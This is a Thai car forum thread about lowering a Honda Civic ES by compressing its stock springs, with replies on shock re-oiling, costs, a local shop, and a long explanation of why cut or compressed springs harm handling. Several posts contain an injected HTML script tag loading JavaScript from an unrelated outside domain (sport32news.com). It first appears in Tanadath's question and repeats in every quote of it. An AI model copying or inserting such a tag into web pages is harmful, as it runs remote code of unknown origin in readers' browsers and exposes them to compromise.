ตอบ
AofStaR


ชื่อเล่น: อ๊อฟ

เข้าร่วม: 25 ธันวา 2011
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1569
ให้คำขอบคุณ: 1125

ที่อยู่: อ.เมือง ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 19 กุมภา 2012 14:34 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
ขอถามหน่อยครับ รถผมใช้สปิงเดิมและโช๊คเดิมโหลดโดยการกดสปิงครับ ใส่ขอบ17"ยาง45 มันก้อนิ่มดีอะครับชอบแต่เวลาวิ่ง140upตอนตกหลุมหรือเนินที่ถนนไม่เรียบรถมันจะเซแล้วก้อโดดทำให้สเกิตคูดกับถนนประจำ ถ้าอยากให้มันไม่เซและโดด ผมควรเพิ่มเติมอะไรครับ
ได้รับคำขอบคุณจาก: nu_es_05  วุฒิชัย 
Ball Featuring


ชื่อเล่น: บอล

เข้าร่วม: 05 ธันวา 2010
ตอบ: 2224

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2668
ให้คำขอบคุณ: 3022

ที่อยู่: พิษณุโลกBIG C
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 19 กุมภา 2012 14:43 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
นำโช็คของท่านไปอัดน้ำมันใหม่ครับ คือแบบว่าของเก่ามันนิ่มไปแล้วแน่ๆเลยจากที่อ่านมา
เนื่องจากน้ำมันเดิมมันหมด+กับหมดอายุแล้ว
ได้รับคำขอบคุณจาก: nu_es_05  วุฒิชัย 
LifeFate


เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 3153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5152
ให้คำขอบคุณ: 215

ที่อยู่: สระบุรี , ปทุมธานี , นครสวรรค์
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 19 กุมภา 2012 14:46 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
ของผม โดดเป็นกบ เลย
ได้รับคำขอบคุณจาก: nu_es_05  วุฒิชัย 
Tanadath


เข้าร่วม: 12 มีนา 2011
ตอบ: 1498

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1165
ให้คำขอบคุณ: 325

ที่อยู่: 240/29ม.2ต.หนองบัวอ.เมืองจ.อุดรธานี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 19 กุมภา 2012 17:39 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
กดสปริงทำอย่างไรครับ โดยการเลื่อนเบ้าหรือเปล่า "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: วุฒิชัย 
nu_es_05


ชื่อเล่น: นุ

เข้าร่วม: 10 มิถุนา 2010
ตอบ: 1555

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1058
ให้คำขอบคุณ: 5949

ที่อยู่: สุขุมวิท 101/1
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 19 กุมภา 2012 20:11 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
ตามนั้นเลยคับหรือไม่ก้เปลี่ยนเปนสปริงโหลดเลยคับ
ได้รับคำขอบคุณจาก: วุฒิชัย 
slek


เข้าร่วม: 14 ธันวา 2009
ตอบ: 789

Guru ES
Guru ES

ได้รับคำขอบคุณ: 918
ให้คำขอบคุณ: 1124
อาทิตย์, 19 กุมภา 2012 20:16 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
อัดน้ำมันกับเลื่อนเบ้าโช๊คครับ
ได้รับคำขอบคุณจาก: วุฒิชัย 
AofStaR


ชื่อเล่น: อ๊อฟ

เข้าร่วม: 25 ธันวา 2011
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1569
ให้คำขอบคุณ: 1125

ที่อยู่: อ.เมือง ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 19 กุมภา 2012 21:18 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
BallBall พิมพ์ว่า:
นำโช็คของท่านไปอัดน้ำมันใหม่ครับ คือแบบว่าของเก่ามันนิ่มไปแล้วแน่ๆเลยจากที่อ่านมา
เนื่องจากน้ำมันเดิมมันหมด+กับหมดอายุแล้ว
ถ้าอัดน้ำมันเราต้องบอกช่างว่าเอาประไหนอะครับ แล้วราคาค่าอัดประมาณเท่าไรครับ
ได้รับคำขอบคุณจาก: วุฒิชัย 
AofStaR


ชื่อเล่น: อ๊อฟ

เข้าร่วม: 25 ธันวา 2011
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1569
ให้คำขอบคุณ: 1125

ที่อยู่: อ.เมือง ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 19 กุมภา 2012 21:22 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
Tanadath พิมพ์ว่า:
กดสปริงทำอย่างไรครับ โดยการเลื่อนเบ้าหรือเปล่า "<script src="https://sport32news.com/civicesgroup.js">
ตอนโหลดช่างบอกว่าใชเครื่องกดสปิงไม่ได้ใช้ความร้อนครับ โหลดลงมาจากเดิม2นิ้วครึ่งครับทั้งหน้าและหลัง ราคา1200
ได้รับคำขอบคุณจาก: วุฒิชัย 
a_ten


ชื่อเล่น: เอ

เข้าร่วม: 11 มกรา 2012
ตอบ: 554

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 519
ให้คำขอบคุณ: 286

ที่อยู่: kanchanaburi
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 19 กุมภา 2012 23:20 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
AofStaR พิมพ์ว่า:
Tanadath พิมพ์ว่า:
กดสปริงทำอย่างไรครับ โดยการเลื่อนเบ้าหรือเปล่า "<script src="https://sport32news.com/civicesgroup.js">
ตอนโหลดช่างบอกว่าใชเครื่องกดสปิงไม่ได้ใช้ความร้อนครับ โหลดลงมาจากเดิม2นิ้วครึ่งครับทั้งหน้าและหลัง ราคา1200


1200 นี่คือต่อล้อหรือทั้งคันคับ "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: วุฒิชัย 
AofStaR


ชื่อเล่น: อ๊อฟ

เข้าร่วม: 25 ธันวา 2011
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1569
ให้คำขอบคุณ: 1125

ที่อยู่: อ.เมือง ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 20 กุมภา 2012 01:12 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
a_ten พิมพ์ว่า:
AofStaR พิมพ์ว่า:
Tanadath พิมพ์ว่า:
กดสปริงทำอย่างไรครับ โดยการเลื่อนเบ้าหรือเปล่า "<script src="https://sport32news.com/civicesgroup.js">
ตอนโหลดช่างบอกว่าใชเครื่องกดสปิงไม่ได้ใช้ความร้อนครับ โหลดลงมาจากเดิม2นิ้วครึ่งครับทั้งหน้าและหลัง ราคา1200


1200 นี่คือต่อล้อหรือทั้งคันคับ "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ทั้งคันครับ
ได้รับคำขอบคุณจาก: วุฒิชัย 
a_ten


ชื่อเล่น: เอ

เข้าร่วม: 11 มกรา 2012
ตอบ: 554

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 519
ให้คำขอบคุณ: 286

ที่อยู่: kanchanaburi
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 20 กุมภา 2012 06:53 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
AofStaR พิมพ์ว่า:
a_ten พิมพ์ว่า:
AofStaR พิมพ์ว่า:
Tanadath พิมพ์ว่า:
กดสปริงทำอย่างไรครับ โดยการเลื่อนเบ้าหรือเปล่า "<script src="https://sport32news.com/civicesgroup.js">
ตอนโหลดช่างบอกว่าใชเครื่องกดสปิงไม่ได้ใช้ความร้อนครับ โหลดลงมาจากเดิม2นิ้วครึ่งครับทั้งหน้าและหลัง ราคา1200


1200 นี่คือต่อล้อหรือทั้งคันคับ "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ทั้งคันครับ


อู่อยู่ในราชบุรีหรือป่าวคับ แถวๆไหนเด๋วผมจะไปทำบ้าง
ขอบคุณมากคับ "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: วุฒิชัย 
AofStaR


ชื่อเล่น: อ๊อฟ

เข้าร่วม: 25 ธันวา 2011
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1569
ให้คำขอบคุณ: 1125

ที่อยู่: อ.เมือง ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 20 กุมภา 2012 12:17 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
a_ten พิมพ์ว่า:
AofStaR พิมพ์ว่า:
a_ten พิมพ์ว่า:
AofStaR พิมพ์ว่า:
Tanadath พิมพ์ว่า:
กดสปริงทำอย่างไรครับ โดยการเลื่อนเบ้าหรือเปล่า "<script src="https://sport32news.com/civicesgroup.js">
ตอนโหลดช่างบอกว่าใชเครื่องกดสปิงไม่ได้ใช้ความร้อนครับ โหลดลงมาจากเดิม2นิ้วครึ่งครับทั้งหน้าและหลัง ราคา1200


1200 นี่คือต่อล้อหรือทั้งคันคับ "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ทั้งคันครับ


อู่อยู่ในราชบุรีหรือป่าวคับ แถวๆไหนเด๋วผมจะไปทำบ้าง
ขอบคุณมากคับ "<script src="https://sport32news.com/civicesgroup.js">
ร้านอยู่แยกบางแพ อะครับ เขาขายล้อแม๊คด้วยชื่อร้านชาติแม๊คอะครับ รองไปดูช่างมีคำแนะนำดีๆให้ด้วยครับ สงใสไรถามได้
ได้รับคำขอบคุณจาก: วุฒิชัย 
ham_ter


ชื่อเล่น: ส้มจี๊ด

เข้าร่วม: 18 ตุลา 2011
ตอบ: 1641

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4624
ให้คำขอบคุณ: 0

ที่อยู่: เชียงใหม่
ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
จันทร์, 20 กุมภา 2012 12:37 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
AofStaR พิมพ์ว่า:
a_ten พิมพ์ว่า:
AofStaR พิมพ์ว่า:
a_ten พิมพ์ว่า:
AofStaR พิมพ์ว่า:
Tanadath พิมพ์ว่า:
กดสปริงทำอย่างไรครับ โดยการเลื่อนเบ้าหรือเปล่า "<script src="https://sport32news.com/civicesgroup.js">
ตอนโหลดช่างบอกว่าใชเครื่องกดสปิงไม่ได้ใช้ความร้อนครับ โหลดลงมาจากเดิม2นิ้วครึ่งครับทั้งหน้าและหลัง ราคา1200


1200 นี่คือต่อล้อหรือทั้งคันคับ "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ทั้งคันครับ


อู่อยู่ในราชบุรีหรือป่าวคับ แถวๆไหนเด๋วผมจะไปทำบ้าง
ขอบคุณมากคับ "<script src="https://sport32news.com/civicesgroup.js">
ร้านอยู่แยกบางแพ อะครับ เขาขายล้อแม๊คด้วยชื่อร้านชาติแม๊คอะครับ รองไปดูช่างมีคำแนะนำดีๆให้ด้วยครับ สงใสไรถามได้

กดยังไงหว่า ไม่เคยเห็น และนึกไม่ออก สปริงนี่มันมีค่า K ด้วยนะ กดอัดไป มันทำได้ยังไงไม่เข้าใจ
แล้วค่า K มันไม่เสียเหรอ แต่เดาว่า วิ่ง เร็วๆ แล้วรูดเซ นี่เกิดจากค่า K ที่มันเพี้ยนไปเหมือนกับการตัดสปริง
ทำให้ ระยะยุบยืดมันเสียไป ทำให้ดีดไม่เท่ากัน ซึ่ง "อันตรายมากมาย"
ถ้าจะให้แนะนำว่าต้องทำอย่างไร ให้เปลี่ยนสปริงโหลดดีกว่า จบกว่าแน่นอน
การทำแบบนี้ ไม่ดีหรอก
ได้รับคำขอบคุณจาก: วุฒิชัย  nu_es_05 
ham_ter


ชื่อเล่น: ส้มจี๊ด

เข้าร่วม: 18 ตุลา 2011
ตอบ: 1641

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4624
ให้คำขอบคุณ: 0

ที่อยู่: เชียงใหม่
ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
จันทร์, 20 กุมภา 2012 12:48 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
ถ้าการกดสปริงทำให้ค่า K ของสปริงเสียไป ขอบอกได้เลยว่า อันตรายต่อการใช้ความเร็ว การทรงตัว และการเข้าโค้งมาก
ถ้าคลานอยู่ในเมืองไม่เป็นไีรมาก แต่ถ้าคุณวิ่งด้วยความเร็วแล้วเกิดแถขึ้นมาจะเกิดอะไรขึ้น ลองอ่านอันนี้ดู ไปเจอมา
อยากเตี้ย ตัดสปริง/สปริงโหลด
การตัดสปริงทำได้ง่าย และได้ความเตี้ย ตามต้องการ แต่ไม่ได้ส่งผลดีต่อการทรงตัวของรถและผิดหลักการ ถ้าตัดสปริงด้วยไฟ ความร้อนจะทำให้ความยืดหยุ่นบริเวณใกล้เคียงเสียไป การตัดด้วยหินเจียร์หรือไฟเบอร์ ไม่มีปัญหาความร้อน แต่มีหลายปัญหาตามมา
การตัดสปริง เมื่อไรที่สปริงสั้นลงก็จะแข็งขึ้น ยุบยาก แต่ดีดตัวแรง เพราะสปริงทำงานยุบและยืดตัวด้วยการบิดตัวของเส้นสปริง แม้จะดูว่าเป็นการยุบตัวตามแนวตรง แต่ตลอดการยุบและยืดตัว จะเกิดขึ้นจากการบิดตัวของเส้นสปริงคล้ายการบิดน้ำออกจากผ้า
สปริงสูงและมีจำนวนรอบมากก็แสดงว่าเริ่มทำจากเหล็กเส้นยาว หากจับปลายเหล็ก 2 ข้างแล้วบิดเหล็กที่ยาว 10 เมตร ย่อมบิดเป็นเกลียวได้ง่ายกว่าเหล็กยาว 1 เมตร
สปริงที่ถูกตัดให้เตี้ย ก็คือสปริงที่สั้นและเหลือเนื้อสปริงสั้นลง เมื่อบิดตัวยากขึ้นก็ทำให้สปริงมีความแข็งมากขึ้นยุบตัวยากนั่นเอง
สปริงที่ถูกตัดจะยุบตัวยาก แต่เมื่อไรที่ยุบในช่วงดีดตัวก็จะดีดแรง มีอาการกระด้างมากขึ้น ถ้าใช้โช้กอัพเดิมที่มีความหนืดซึ่งเหมาะสมกับสปริงที่นิ่ม โช้กอัพก็จะรั้งในช่วงที่สปริงดีดตัวไม่ไหว สปริงยังดีดแรงและเร็ว ส่วนโช้กอัพก็จะพังเร็ว
นอกจากความแข็งที่เพิ่มขึ้นแบบไม่ตรงตามต้องการ (เพราะยิ่งตัดเหลือสั้นก็ยิ่งแข็ง) ซึ่งสปริงชุดโหลดที่ผลิตขึ้นมาโดยเฉพาะก็แข็งกว่าสปริงเดิม แต่ส่วนใหญ่ไม่ได้แข็งกว่ามากนัก
ปัญหาสำคัญอยู่ที่ ปลายสปริงที่ถูกตัดชี้ขึ้น ไม่ได้งอลงแนบกับเบ้าเหมือนสปริงเดิม เมื่อใส่เข้าไปปลายก็ถูกกดแนบกับเบ้าได้ แต่ปลายสปริงที่เคยชี้ออกมา จะทำให้สปริงมีการฝืนตัวอยู่ ทั้งการยุบและยืดตัวล้วนมีการดิ้นออกข้าง ไม่ได้เกิดขึ้นในแนวตรงตามเดิม การยืดหยุ่นไม่สมบูรณ์และส่งผลให้โช้กอัพมีแรงกระทำด้านข้างแทนที่จะเป็นแรงกระทำแนวดิ่งตรงๆ โช้กอัพที่ใช้งานร่วมกับสปริงตัดจึงอายุสั้นทั้งจากการดีดตัวที่แรงขึ้นและการดิ้นออกด้านข้าง
การเป่าไฟดัดปลายสปริง ส่งผลให้เส้นสปริงบริเวณนั้นและใกล้เคียงเสียความยืดหยุุ่น วีธีที่ถูกต้องเมื่อต้องการความเตี้ย คือ เปลี่ยน สปริงชุดโหลดที่ทำขึ้นโดยตรง (ราคา 4 เส้น 6-9 พันบาท) เลือกรุ่นที่มีความแข็งมากกว่าสปริงเดิมไม่มากนัก ใช้ร่วมกับโช้กอัพชุดแต่งที่มีความหนืดมากขึ้นโดยเฉพาะในช่วงยืดตัวหรือรีบาวน์ เพื่อรั้งการดีดตัวของสปริงที่แรงขึ้น หรือหาเทียบสปริงจากรถรุ่นอื่นมาใช้ ซึ่งยุ่งยากแต่ถูกกว่า
ถ้าอยากให้รถ์เตี้ย ลืมการตัดสปริงไปได้เลย เตี้ยลงจริงและค่าใช้จ่ายต่ำ แต่ผลที่ได้แย่ทั้งการทรงตัวและความนุ่มนวล
ได้รับคำขอบคุณจาก: nooduean_69  a_ten  วุฒิชัย  MickeyMouse  TidTlE  nu_es_05  NuuTeee 
jk_1


เข้าร่วม: 09 ธันวา 2009
ตอบ: 293

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 749
ให้คำขอบคุณ: 3

ที่อยู่: Bang-Phlee Samutprakran
ปี: 2003
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 20 กุมภา 2012 13:15 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
ham_ter พิมพ์ว่า:
ถ้าการกดสปริงทำให้ค่า K ของสปริงเสียไป ขอบอกได้เลยว่า อันตรายต่อการใช้ความเร็ว การทรงตัว และการเข้าโค้งมาก
ถ้าคลานอยู่ในเมืองไม่เป็นไีรมาก แต่ถ้าคุณวิ่งด้วยความเร็วแล้วเกิดแถขึ้นมาจะเกิดอะไรขึ้น ลองอ่านอันนี้ดู ไปเจอมา
อยากเตี้ย ตัดสปริง/สปริงโหลด
การตัดสปริงทำได้ง่าย และได้ความเตี้ย ตามต้องการ แต่ไม่ได้ส่งผลดีต่อการทรงตัวของรถและผิดหลักการ ถ้าตัดสปริงด้วยไฟ ความร้อนจะทำให้ความยืดหยุ่นบริเวณใกล้เคียงเสียไป การตัดด้วยหินเจียร์หรือไฟเบอร์ ไม่มีปัญหาความร้อน แต่มีหลายปัญหาตามมา
การตัดสปริง เมื่อไรที่สปริงสั้นลงก็จะแข็งขึ้น ยุบยาก แต่ดีดตัวแรง เพราะสปริงทำงานยุบและยืดตัวด้วยการบิดตัวของเส้นสปริง แม้จะดูว่าเป็นการยุบตัวตามแนวตรง แต่ตลอดการยุบและยืดตัว จะเกิดขึ้นจากการบิดตัวของเส้นสปริงคล้ายการบิดน้ำออกจากผ้า
สปริงสูงและมีจำนวนรอบมากก็แสดงว่าเริ่มทำจากเหล็กเส้นยาว หากจับปลายเหล็ก 2 ข้างแล้วบิดเหล็กที่ยาว 10 เมตร ย่อมบิดเป็นเกลียวได้ง่ายกว่าเหล็กยาว 1 เมตร
สปริงที่ถูกตัดให้เตี้ย ก็คือสปริงที่สั้นและเหลือเนื้อสปริงสั้นลง เมื่อบิดตัวยากขึ้นก็ทำให้สปริงมีความแข็งมากขึ้นยุบตัวยากนั่นเอง
สปริงที่ถูกตัดจะยุบตัวยาก แต่เมื่อไรที่ยุบในช่วงดีดตัวก็จะดีดแรง มีอาการกระด้างมากขึ้น ถ้าใช้โช้กอัพเดิมที่มีความหนืดซึ่งเหมาะสมกับสปริงที่นิ่ม โช้กอัพก็จะรั้งในช่วงที่สปริงดีดตัวไม่ไหว สปริงยังดีดแรงและเร็ว ส่วนโช้กอัพก็จะพังเร็ว
นอกจากความแข็งที่เพิ่มขึ้นแบบไม่ตรงตามต้องการ (เพราะยิ่งตัดเหลือสั้นก็ยิ่งแข็ง) ซึ่งสปริงชุดโหลดที่ผลิตขึ้นมาโดยเฉพาะก็แข็งกว่าสปริงเดิม แต่ส่วนใหญ่ไม่ได้แข็งกว่ามากนัก
ปัญหาสำคัญอยู่ที่ ปลายสปริงที่ถูกตัดชี้ขึ้น ไม่ได้งอลงแนบกับเบ้าเหมือนสปริงเดิม เมื่อใส่เข้าไปปลายก็ถูกกดแนบกับเบ้าได้ แต่ปลายสปริงที่เคยชี้ออกมา จะทำให้สปริงมีการฝืนตัวอยู่ ทั้งการยุบและยืดตัวล้วนมีการดิ้นออกข้าง ไม่ได้เกิดขึ้นในแนวตรงตามเดิม การยืดหยุ่นไม่สมบูรณ์และส่งผลให้โช้กอัพมีแรงกระทำด้านข้างแทนที่จะเป็นแรงกระทำแนวดิ่งตรงๆ โช้กอัพที่ใช้งานร่วมกับสปริงตัดจึงอายุสั้นทั้งจากการดีดตัวที่แรงขึ้นและการดิ้นออกด้านข้าง
การเป่าไฟดัดปลายสปริง ส่งผลให้เส้นสปริงบริเวณนั้นและใกล้เคียงเสียความยืดหยุุ่น วีธีที่ถูกต้องเมื่อต้องการความเตี้ย คือ เปลี่ยน สปริงชุดโหลดที่ทำขึ้นโดยตรง (ราคา 4 เส้น 6-9 พันบาท) เลือกรุ่นที่มีความแข็งมากกว่าสปริงเดิมไม่มากนัก ใช้ร่วมกับโช้กอัพชุดแต่งที่มีความหนืดมากขึ้นโดยเฉพาะในช่วงยืดตัวหรือรีบาวน์ เพื่อรั้งการดีดตัวของสปริงที่แรงขึ้น หรือหาเทียบสปริงจากรถรุ่นอื่นมาใช้ ซึ่งยุ่งยากแต่ถูกกว่า
ถ้าอยากให้รถ์เตี้ย ลืมการตัดสปริงไปได้เลย เตี้ยลงจริงและค่าใช้จ่ายต่ำ แต่ผลที่ได้แย่ทั้งการทรงตัวและความนุ่มนวล
ได้รับคำขอบคุณจาก: วุฒิชัย 
AofStaR


ชื่อเล่น: อ๊อฟ

เข้าร่วม: 25 ธันวา 2011
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1569
ให้คำขอบคุณ: 1125

ที่อยู่: อ.เมือง ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 20 กุมภา 2012 15:12 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
ham_ter พิมพ์ว่า:
ถ้าการกดสปริงทำให้ค่า K ของสปริงเสียไป ขอบอกได้เลยว่า อันตรายต่อการใช้ความเร็ว การทรงตัว และการเข้าโค้งมาก
ถ้าคลานอยู่ในเมืองไม่เป็นไีรมาก แต่ถ้าคุณวิ่งด้วยความเร็วแล้วเกิดแถขึ้นมาจะเกิดอะไรขึ้น ลองอ่านอันนี้ดู ไปเจอมา
อยากเตี้ย ตัดสปริง/สปริงโหลด
การตัดสปริงทำได้ง่าย และได้ความเตี้ย ตามต้องการ แต่ไม่ได้ส่งผลดีต่อการทรงตัวของรถและผิดหลักการ ถ้าตัดสปริงด้วยไฟ ความร้อนจะทำให้ความยืดหยุ่นบริเวณใกล้เคียงเสียไป การตัดด้วยหินเจียร์หรือไฟเบอร์ ไม่มีปัญหาความร้อน แต่มีหลายปัญหาตามมา
การตัดสปริง เมื่อไรที่สปริงสั้นลงก็จะแข็งขึ้น ยุบยาก แต่ดีดตัวแรง เพราะสปริงทำงานยุบและยืดตัวด้วยการบิดตัวของเส้นสปริง แม้จะดูว่าเป็นการยุบตัวตามแนวตรง แต่ตลอดการยุบและยืดตัว จะเกิดขึ้นจากการบิดตัวของเส้นสปริงคล้ายการบิดน้ำออกจากผ้า
สปริงสูงและมีจำนวนรอบมากก็แสดงว่าเริ่มทำจากเหล็กเส้นยาว หากจับปลายเหล็ก 2 ข้างแล้วบิดเหล็กที่ยาว 10 เมตร ย่อมบิดเป็นเกลียวได้ง่ายกว่าเหล็กยาว 1 เมตร
สปริงที่ถูกตัดให้เตี้ย ก็คือสปริงที่สั้นและเหลือเนื้อสปริงสั้นลง เมื่อบิดตัวยากขึ้นก็ทำให้สปริงมีความแข็งมากขึ้นยุบตัวยากนั่นเอง
สปริงที่ถูกตัดจะยุบตัวยาก แต่เมื่อไรที่ยุบในช่วงดีดตัวก็จะดีดแรง มีอาการกระด้างมากขึ้น ถ้าใช้โช้กอัพเดิมที่มีความหนืดซึ่งเหมาะสมกับสปริงที่นิ่ม โช้กอัพก็จะรั้งในช่วงที่สปริงดีดตัวไม่ไหว สปริงยังดีดแรงและเร็ว ส่วนโช้กอัพก็จะพังเร็ว
นอกจากความแข็งที่เพิ่มขึ้นแบบไม่ตรงตามต้องการ (เพราะยิ่งตัดเหลือสั้นก็ยิ่งแข็ง) ซึ่งสปริงชุดโหลดที่ผลิตขึ้นมาโดยเฉพาะก็แข็งกว่าสปริงเดิม แต่ส่วนใหญ่ไม่ได้แข็งกว่ามากนัก
ปัญหาสำคัญอยู่ที่ ปลายสปริงที่ถูกตัดชี้ขึ้น ไม่ได้งอลงแนบกับเบ้าเหมือนสปริงเดิม เมื่อใส่เข้าไปปลายก็ถูกกดแนบกับเบ้าได้ แต่ปลายสปริงที่เคยชี้ออกมา จะทำให้สปริงมีการฝืนตัวอยู่ ทั้งการยุบและยืดตัวล้วนมีการดิ้นออกข้าง ไม่ได้เกิดขึ้นในแนวตรงตามเดิม การยืดหยุ่นไม่สมบูรณ์และส่งผลให้โช้กอัพมีแรงกระทำด้านข้างแทนที่จะเป็นแรงกระทำแนวดิ่งตรงๆ โช้กอัพที่ใช้งานร่วมกับสปริงตัดจึงอายุสั้นทั้งจากการดีดตัวที่แรงขึ้นและการดิ้นออกด้านข้าง
การเป่าไฟดัดปลายสปริง ส่งผลให้เส้นสปริงบริเวณนั้นและใกล้เคียงเสียความยืดหยุุ่น วีธีที่ถูกต้องเมื่อต้องการความเตี้ย คือ เปลี่ยน สปริงชุดโหลดที่ทำขึ้นโดยตรง (ราคา 4 เส้น 6-9 พันบาท) เลือกรุ่นที่มีความแข็งมากกว่าสปริงเดิมไม่มากนัก ใช้ร่วมกับโช้กอัพชุดแต่งที่มีความหนืดมากขึ้นโดยเฉพาะในช่วงยืดตัวหรือรีบาวน์ เพื่อรั้งการดีดตัวของสปริงที่แรงขึ้น หรือหาเทียบสปริงจากรถรุ่นอื่นมาใช้ ซึ่งยุ่งยากแต่ถูกกว่า
ถ้าอยากให้รถ์เตี้ย ลืมการตัดสปริงไปได้เลย เตี้ยลงจริงและค่าใช้จ่ายต่ำ แต่ผลที่ได้แย่ทั้งการทรงตัวและความนุ่มนวล
-ขอบคุณครับ ขอมูลดีๆๆ น่าจะตามนี้เลยครับ เพราะวิ่งที่ความเร็ว120-130ไม่มีปัญหาเรื่องการทรงตัวและความนิ่มนวม แต่ถ้า140ขึ้นรู้สึกได้เลยว่าเวลาแซงจะหลุดๆล้นๆเหมือนเอามะค่อยอยู่ ยิ่งถ้าความนิ่มนวลไม่ต้องพูดถึงครับคูดตั้งแต่สเกิรตกันชนหน้ายันใต้ท้องรวมไปถึงปลายท่อ ตอนนี้เลยแก้ปัญหาโดยการไม่ขับเร็วครับ100-120พอประหยัดด้วยผมไม่ได้ติดแก็สครับ ขอให้กรณีผมเป็นกรณีศึกษาครับ สำหรับเพื่อนๆที่ิคิดจะตัด/กด สปิืงในการโหลด ราคาถูกจริงโหลดโดยการกด1200ทั้ง4ล้อ โหลดโดยกดตัด600ทั้ง4ล้อ
ได้รับคำขอบคุณจาก: a_ten  วุฒิชัย  TidTlE  nu_es_05 
AofStaR


ชื่อเล่น: อ๊อฟ

เข้าร่วม: 25 ธันวา 2011
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1569
ให้คำขอบคุณ: 1125

ที่อยู่: อ.เมือง ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 20 กุมภา 2012 15:24 - ถามเรื่องโหลดสปิงเดิมโช๊คเดิม
ham_ter พิมพ์ว่า:
AofStaR พิมพ์ว่า:
a_ten พิมพ์ว่า:
AofStaR พิมพ์ว่า:
a_ten พิมพ์ว่า:
AofStaR พิมพ์ว่า:
Tanadath พิมพ์ว่า:
กดสปริงทำอย่างไรครับ โดยการเลื่อนเบ้าหรือเปล่า "<script src="https://sport32news.com/civicesgroup.js">
ตอนโหลดช่างบอกว่าใชเครื่องกดสปิงไม่ได้ใช้ความร้อนครับ โหลดลงมาจากเดิม2นิ้วครึ่งครับทั้งหน้าและหลัง ราคา1200


1200 นี่คือต่อล้อหรือทั้งคันคับ "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ทั้งคันครับ


อู่อยู่ในราชบุรีหรือป่าวคับ แถวๆไหนเด๋วผมจะไปทำบ้าง
ขอบคุณมากคับ "<script src="https://sport32news.com/civicesgroup.js">
ร้านอยู่แยกบางแพ อะครับ เขาขายล้อแม๊คด้วยชื่อร้านชาติแม๊คอะครับ รองไปดูช่างมีคำแนะนำดีๆให้ด้วยครับ สงใสไรถามได้

กดยังไงหว่า ไม่เคยเห็น และนึกไม่ออก สปริงนี่มันมีค่า K ด้วยนะ กดอัดไป มันทำได้ยังไงไม่เข้าใจ
แล้วค่า K มันไม่เสียเหรอ แต่เดาว่า วิ่ง เร็วๆ แล้วรูดเซ นี่เกิดจากค่า K ที่มันเพี้ยนไปเหมือนกับการตัดสปริง
ทำให้ ระยะยุบยืดมันเสียไป ทำให้ดีดไม่เท่ากัน ซึ่ง "อันตรายมากมาย"
ถ้าจะให้แนะนำว่าต้องทำอย่างไร ให้เปลี่ยนสปริงโหลดดีกว่า จบกว่าแน่นอน
